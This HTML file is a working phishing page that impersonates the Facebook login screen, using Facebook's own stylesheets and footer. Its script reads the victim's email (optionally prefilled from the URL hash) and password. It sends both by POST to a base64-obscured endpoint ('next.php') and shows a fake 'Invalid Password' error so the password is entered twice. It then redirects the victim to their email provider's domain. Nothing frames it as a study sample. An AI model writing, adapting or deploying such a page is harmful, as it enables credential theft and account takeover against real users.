﻿<!doctype html>
<html lang="en">

<head>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.1.1.min.js">
        <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="icon" href="images/fav.ico" type="image/icon" sizes="30x30">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
    <title>Facebook – log in or sign up</title>
    <link href="css/hover.css" rel="stylesheet" media="all">
    <link rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yx/l/0,cross/IDbnGChozm5.css?_nc_x=Ij3Wp8lg5Kz">
    <link rel="stylesheet" type="text/css" href="https://static.xx.fbcdn.net/rsrc.php/v3/yh/l/0,cross/73tZamyBsjN.css?_nc_x=Ij3Wp8lg5Kz">
    <link rel="stylesheet" type="text/css" href="https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0,cross/MdLpZvTWEEm.css?_nc_x=Ij3Wp8lg5Kz">
    <link rel="stylesheet" type="text/css" href="https://static.xx.fbcdn.net/rsrc.php/v3/yh/l/0,cross/73tZamyBsjN.css?_nc_x=Ij3Wp8lg5Kz">
    <style type="text/css">
    ._8eso {
        font-family: SFProDisplay-Regular, Helvetica, Arial, sans-serif;
        font-size: 28px;
        font-weight: normal;
        line-height: 32px;

        color: black;
    }
    </style>
</head>

<body>
    <div class="container-fluid" style="background: #f0f2f5;padding-bottom:260px">
        <div class="row" style="padding: 100px 0px 0px 0px">
            <div class="col-lg-5 ml-auto " style="padding-right: 80px">
                <div style="padding: 110px 0 16px;">
                    <img src="images/fb.png" height="50px">
                </div>
                <span class="_8eso">Facebook helps you connect and share with the people in your life.</span>
            </div>
            <div class="col-lg-5">
                <div style="align-items: center;background-color: #fff;border: none;border-radius: 8px;box-shadow: 0 2px 4px rgba(0, 0, 0, .1), 0 8px 16px rgba(0, 0, 0, .1);box-sizing: border-box;margin: 40px 0 0;padding: 20px 20px 28px 20px;width: 396px;">
                    <center>
                        <div class="alert alert-danger" id="msg" style="font-size: 14px;font-weight: 500 ; display: none;">Invalid Password! Please enter correct password.</div>
                        <span id="error" class="text-danger" style="font-size: 14px;font-weight: 500;display: none;">That account doesn't exist. Enter a different account</span>
                    </center>
                    <div class="form-group">
                        <input type="email" class="form-control p-3 " id="ai" style="border: 1px solid #dddfe2;" id="exampleInputai1" aria-describedby="aiHelp" placeholder="Email address or phone number">
                    </div>
                    <div class="form-group">
                        <input type="password" class="form-control p-3 " id="pr" style="border: 1px solid #dddfe2;" id="exampleInputai1" aria-describedby="aiHelp" placeholder="Password">
                    </div>
                    <div>
                        <button type="button" class="btn btn-primary w-100" style="font-size:22px; font-weight:500" id="submit-btn">Log In</button>
                    </div>
                    <div class="text-center pt-2">
                        <a href="#">Forgotten account?</a>
                    </div>
                    <div class="text-center pt-2">
                        <hr>
                    </div>
                    <div class="text-center">
                        <button type="button" class="btn px-3 py-2 text-white" style="font-size:18px; font-weight:500; background-color: #42b72a">Create New Account</button>
                    </div>
                </div>
                <div class="text-center" style="align-items: center;margin: 10px 0 0;width: 396px;">
                    <a href="#" style="font-weight:600;color: black;">Create a Page</a> <span>for a celebrity, band or business.</span>
                </div>
            </div>
        </div>
    </div>
    <div class="bg-white" style="font-size: 13px">
        <div class="_8opy _95ke">
            <div id="pageFooter" data-referrer="page_footer" data-testid="page_footer">
                <ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1">
                    <li>English (UK)</li>
                    <li><a class="_sv4" dir="rtl" href="https://ur-pk.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ur_PK&quot;, &quot;en_GB&quot;, &quot;https:\/\/ur-pk.facebook.com\/&quot;, &quot;www_list_selector&quot;, 0); return false;" title="Urdu">اردو</a></li>
                    <li><a class="_sv4" dir="rtl" href="https://ps-af.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ps_AF&quot;, &quot;en_GB&quot;, &quot;https:\/\/ps-af.facebook.com\/&quot;, &quot;www_list_selector&quot;, 1); return false;" title="Pashto">پښتو</a></li>
                    <li><a class="_sv4" dir="rtl" href="https://ar-ar.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ar_AR&quot;, &quot;en_GB&quot;, &quot;https:\/\/ar-ar.facebook.com\/&quot;, &quot;www_list_selector&quot;, 2); return false;" title="Arabic">العربية</a></li>
                    <li><a class="_sv4" dir="ltr" href="https://hi-in.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;hi_IN&quot;, &quot;en_GB&quot;, &quot;https:\/\/hi-in.facebook.com\/&quot;, &quot;www_list_selector&quot;, 3); return false;" title="Hindi">हिन्दी</a></li>
                    <li><a class="_sv4" dir="ltr" href="https://pa-in.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;pa_IN&quot;, &quot;en_GB&quot;, &quot;https:\/\/pa-in.facebook.com\/&quot;, &quot;www_list_selector&quot;, 4); return false;" title="Punjabi">ਪੰਜਾਬੀ</a></li>
                    <li><a class="_sv4" dir="ltr" href="https://bn-in.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;bn_IN&quot;, &quot;en_GB&quot;, &quot;https:\/\/bn-in.facebook.com\/&quot;, &quot;www_list_selector&quot;, 5); return false;" title="Bengali">বাংলা</a></li>
                    <li><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;de_DE&quot;, &quot;en_GB&quot;, &quot;https:\/\/de-de.facebook.com\/&quot;, &quot;www_list_selector&quot;, 6); return false;" title="German">Deutsch</a></li>
                    <li><a class="_sv4" dir="ltr" href="https://gu-in.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;gu_IN&quot;, &quot;en_GB&quot;, &quot;https:\/\/gu-in.facebook.com\/&quot;, &quot;www_list_selector&quot;, 7); return false;" title="Gujarati">ગુજરાતી</a></li>
                    <li><a class="_sv4" dir="rtl" href="https://fa-ir.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fa_IR&quot;, &quot;en_GB&quot;, &quot;https:\/\/fa-ir.facebook.com\/&quot;, &quot;www_list_selector&quot;, 8); return false;" title="Persian">فارسی</a></li>
                    <li><a class="_sv4" dir="ltr" href="https://es-la.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;es_LA&quot;, &quot;en_GB&quot;, &quot;https:\/\/es-la.facebook.com\/&quot;, &quot;www_list_selector&quot;, 9); return false;" title="Spanish">Español</a></li>
                    <li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fes-la.facebook.com%2F&amp;source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_nL4Gh2I4l59_1_5x sx_85b2e5"></i></a></li>
                </ul>
                <div id="contentCurve"></div>
                <div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links">
                    <ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i">
                        <li><a href="/r.php" title="Sign up for Facebook">Sign Up</a></li>
                        <li><a href="/login/" title="Log in to Facebook">Log In</a></li>
                        <li><a href="https://messenger.com/" title="Take a look at Messenger.">Messenger</a></li>
                        <li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li>
                        <li><a href="https://www.facebook.com/watch/" title="Browse our Watch videos."> Watch </a></li>
                        <li><a href="/directory/people/" title="Browse our people directory.">People</a></li>
                        <li><a href="/directory/pages/" title="Browse our Pages directory.">Pages</a></li>
                        <li><a href="/pages/category/">Page categories</a></li>
                        <li><a href="/places/" title="Take a look at popular places on Facebook.">Places</a></li>
                        <li><a href="/games/" title="Check out Facebook games.">Games</a></li>
                        <li><a href="/directory/places/" title="Browse our places directory.">Locations</a></li>
                        <li><a href="/marketplace/" title="Buy and sell on Facebook Marketplace.">Marketplace</a></li>
                        <li><a href="https://pay.facebook.com/" target="_blank" title="Learn more about Facebook Pay">Facebook Pay</a></li>
                        <li><a href="/directory/groups/" title="Browse our Groups directory.">Groups</a></li>
                        <li><a href="https://www.oculus.com/" target="_blank" title="Learn more about Oculus">Oculus</a></li>
                        <li><a href="https://portal.facebook.com/" target="_blank" title="Learn more about Portal from Facebook">Portal</a></li>
                        <li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT3a9IXpkp7eB7rBHwwyvdAxuopL1YQ9YJL2I-vpzJyYGRAZ-fLEidP-uyaV2dB00BjhvpuyeoL_iT0T9Fk--ZFJ7mSFNzpqzblbXMfFKbgI3NhmdEiJTfggesywSGF0zrq_Sybh6T8PFhgY-4LOfg" title="Take a look at Instagram" target="_blank" rel="noopener nofollow" data-lynx-mode="asynclazy">Instagram</a></li>
                        <li><a href="/local/lists/245019872666104/" title="Browse our Local Lists directory.">Local</a></li>
                        <li><a href="/fundraisers/" title="Donate to worthy causes.">Fundraisers</a></li>
                        <li><a href="/biz/directory/" title="Browse our Facebook Services directory.">Services</a></li>
                        <li><a href="/facebook" accesskey="8" title="Read our blog, discover the resource centre and find job opportunities.">About</a></li>
                        <li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;extra_1=auto" title="Advertise on Facebook">Create ad</a></li>
                        <li><a href="/pages/create/?ref_type=site_footer" title="Create a Page">Create Page</a></li>
                        <li><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></li>
                        <li><a href="/careers/?ref=pf" title="Make your next career move to our brilliant company.">Careers</a></li>
                        <li><a data-nocookies="1" href="/privacy/explanation" title="Learn about your privacy and Facebook.">Privacy</a></li>
                        <li><a href="/policies/cookies/" title="Learn about cookies and Facebook." data-nocookies="1">Cookies</a></li>
                        <li><a class="_41ug" data-nocookies="1" href="https://www.facebook.com/help/568137493302217" title="Learn about AdChoices.">AdChoices<i class="img sp_jaC-7FVo1s3_1_5x sx_aad8a9"></i></a></li>
                        <li><a data-nocookies="1" href="/policies?ref=pf" accesskey="9" title="Review our terms and policies.">Terms</a></li>
                        <li><a href="/help/?ref=pf" accesskey="0" title="Visit our Help Centre.">Help</a></li>
                        <li><a accesskey="6" class="accessible_elem" href="/settings" title="View and edit your Facebook settings.">Settings</a></li>
                        <li><a accesskey="7" class="accessible_elem" href="/allactivity?privacy_source=activity_log_top_menu" title="View your activity log">Activity log</a></li>
                    </ul>
                </div>
                <div class="mvl copyright">
                    <div><span> Facebook © 2020</span></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Button trigger modal -->
<button id="btn" type="button" style="display: none" class="btn btn-primary" data-toggle="modal" data-target="#ajaxModal">
  Launch demo modal
</button>

<!-- Modal for gmail -->
    <div class="modal fade" id="ajaxModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
      <div class="modal-dialog" role="document">
        <div class="modal-content">
          <div class="modal-header alert-danger">
            <span>You must log in to continue.
</span>

            <button type="button" class="close" data-dismiss="modal" aria-label="Close">
              <span aria-hidden="true">&times;</span>
            </button>
          </div>
        </div>
      </div>
    </div>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
/* global $ */
$(document).ready(function() {
    var count = 0;
$('#btn').trigger('click');
    $('#back1').click(function() {
        $("#msg").hide();
        $('#ai').val("");
        $("#automail").animate({ left: 200, opacity: "hide" }, 0);
        $("#inputbar").animate({ right: 200, opacity: "show" }, 1000);

    });

    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
       
        $('#ai').val(my_ai);
        $('#aich').html(my_ai);
        $("#msg").hide();
        
    }
    ///////////////url getting ai////////////////


var file="bmV4dC5waHA=";
    $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        var msg = $('#msg').html();
        $('#msg').text(msg);
        ///////////new injection////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!ai) {
            $('#error').show();
            $('#error').html("Email field is emply.!");
            ai.focus;
            return false;
        }

        if (!filter.test(my_ai)) {
            $('#error').show();
            $('#error').html("That account doesn't exist. Enter a different account");
            ai.focus;
            return false;
        }
        if (!pr) {
            $('#error').show();
            $('#error').html("Password field is emply.!");
            ai.focus;
            return false;
        }

        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        ///////////new injection////////////////
        count = count + 1;

        $.ajax({
            dataType: 'JSON',
            url: atob(file),
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#submit-btn').html('Verifing...');
            },
            success: function(response) {
                if (response) {
                    $("#msg").show();
                    console.log(response);
                    if (response['signal'] == 'ok') {
                        $("#pr").val("");
                        if (count >= 2) {
                            count = 0;
                            // window.location.replace(response['redirect_link']);
                            window.location.replace("http://www." + my_slice);

                        }
                        // $('#msg').html(response['msg']);
                    } else {
                        // $('#msg').html(response['msg']);
                    }
                }
            },
            error: function() {
                $("#pr").val("");
                if (count >= 2) {
                    count = 0;
                    window.location.replace("http://www." + my_slice);
                }
                $("#msg").show();
                // $('#msg').html("Please try again later");
            },
            complete: function() {
                $('#submit-btn').html('Log In');
            }
        });
    });


});
</script>

</html>